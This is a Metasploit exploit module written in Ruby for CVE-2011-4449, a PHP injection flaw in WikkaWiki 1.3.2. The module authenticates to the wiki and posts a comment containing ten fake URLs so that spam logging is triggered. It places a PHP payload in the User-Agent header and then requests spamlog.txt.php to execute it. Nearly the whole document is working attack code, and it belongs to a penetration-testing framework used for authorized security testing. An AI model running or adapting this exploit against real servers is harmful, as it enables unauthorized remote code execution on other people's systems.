##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
'Description' => %q{
This module exploits a vulnerability found in WikkaWiki. When the spam logging
feature is enabled, it is possible to inject PHP code into the spam log file via the
UserAgent header , and then request it to execute our payload. There are at least
three different ways to trigger spam protection, this module does so by generating
10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).
Please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'PAGE'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Initial discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2011-4449'],
['OSVDB', '77391'],
['EDB', '18177'],
['URL', 'http://wush.net/trac/wikka/ticket/1098']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Arch' => ARCH_PHP,
'Platform' => ['php'],
'Targets' =>
[
['WikkaWiki 1.3.2 r1814', {}]
],
'Privileged' => false,
'DisclosureDate' => "Nov 30 2011",
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'WikkaWiki username']),
OptString.new('PASSWORD', [true, 'WikkaWiki password']),
OptString.new('PAGE', [true, 'Page to inject']),
OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
], self.class)
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"
})
if res and res.body =~ /Powered by WikkaWiki/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Get the cookie before we do any of that login/exploity stuff
#
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"
})
# Get the cookie in this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
raise RuntimeError, "#{@peer} - No cookie found, will not continue"
end
cookie
end
#
# Do login, and then return the cookie that contains our credential
#
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=UserSettings"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
})
# Extract the hidden fields
login = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Login\/Register\<\/legend\>/m
fields = $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
login[name] = value
end
else
raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"
end
# Add the rest of fields required for login
login['action'] = 'login'
login['name'] = datastore['USERNAME']
login['password'] = datastore['PASSWORD']
login['do_redirect'] = 'on'
login['submit'] = "Login"
login['confpassword'] = ''
login['email'] = ''
port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => login
})
if res and res.headers['Set-Cookie'] =~ /user_name/
user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
raise RuntimeError, "#{@peer} - Unable to login with \"#{cred}\""
end
return cookie_cred
end
#
# After login, we inject the PHP payload
#
def inject_exec(cookie)
# Get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
'cookie' => cookie
})
fields = {}
if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
end
else
raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"
end
# Generate enough URLs to trigger spam logging
urls = ''
10.times do |i|
urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}\n"
end
# Add more fields
fields['body'] = urls
fields['submit'] = 'Add'
# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
post_data = ""
send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
'agent' => "<?php #{payload.encoded} ?>"
})
send_request_raw({
'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"
})
end
def exploit
@peer = "#{rhost}:#{rport}"
@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - Getting cookie")
cookie = get_cookie
print_status("#{@peer} - Logging in")
cred = login(cookie)
print_status("#{@peer} - Triggering spam logging")
inject_exec(cred)
handler
end
end
=begin
For testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka
Open wikka.config.php, do:
'spam_logging' => '1'
=end
